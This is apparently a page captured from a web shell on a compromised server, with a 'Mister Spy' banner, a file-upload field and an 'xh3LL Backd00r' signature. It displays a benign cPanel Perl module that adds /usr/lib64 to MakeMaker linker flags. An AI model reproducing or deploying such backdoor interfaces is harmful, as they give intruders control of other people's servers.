Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /scripts/cpan_sandbox/ExtUtils/MakeMaker/
Upload File :
Current File : //scripts/cpan_sandbox/ExtUtils/MakeMaker/64BitHack.pm

## no critic(RequireExplicitPackage)

my $cwd;

eval { require Cwd; $cwd = Cwd::fastcwd(); };

$cwd ||= `pwd`;

chomp($cwd);

if ( $cwd !~ /\/ExtUtils-MakeMaker/ ) {    # case 50362: If we are reinstalling ExtUtils-MakeMaker skip the hack

    eval { require ExtUtils::MakeMaker; };

    if ( !$@ ) {
        my $ExtUtils__MakeMaker__WriteMakefile = \&ExtUtils::MakeMaker::WriteMakefile;
        eval <<'EXTUTILSMAKEMAKERWRITEMAKEFILE_CHANGE_END';
no warnings 'redefine';
sub ExtUtils::MakeMaker::WriteMakefile {
    my %OPTS = @_;
    foreach my $opt ('LIBS','LDFLAGS') {
        if ($OPTS{$opt}) {
            if (ref $OPTS{$opt} eq 'ARRAY') {
                ${$OPTS{$opt}}[0] = "-L/usr/lib64 " . ${$OPTS{$opt}}[0];
            } else {
                $OPTS{$opt} = "-L/usr/lib64 " . $OPTS{$opt};
            }
        }
    }
    return $ExtUtils__MakeMaker__WriteMakefile->(%OPTS);
}
EXTUTILSMAKEMAKERWRITEMAKEFILE_CHANGE_END

    }
}

1;

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat